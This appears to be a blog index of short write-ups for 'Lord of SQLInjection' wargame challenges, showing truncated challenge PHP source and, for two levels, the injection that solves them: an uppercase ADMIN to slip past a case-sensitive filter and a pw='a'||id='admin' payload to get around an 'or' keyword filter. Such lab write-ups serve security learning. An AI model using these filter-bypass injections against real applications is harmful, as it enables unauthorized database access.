[Web Hacking]/[LOS] 24

[LOS] TROLL
query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id'] == 'admin') solve("troll"); highlight_file(__FILE__);?>
MySQL's VARCHAR, CHAR, and TEXT types are compared case-insensitively by default. tomining.tistory.com/179
The preg_match filter only matches admin in lowercase, so submitting ADMIN in uppercase solves the challenge.
query : select id from prob_troll where id='ADMIN'
2020. 12. 13.

[LOS] ORGE
query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); highlight_file(__FILE__..
2020. 12. 13.

[LOS] DARKELF
query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("darkelf"); highlight_file(__FILE__); ?>
The keyword or is filtered, so || is used instead.
query : select id from prob_darkelf where id='guest' and pw='a'||id='admin'
2020. 12. 13.

[LOS] WOLFMAN
Source
2020. 12. 12.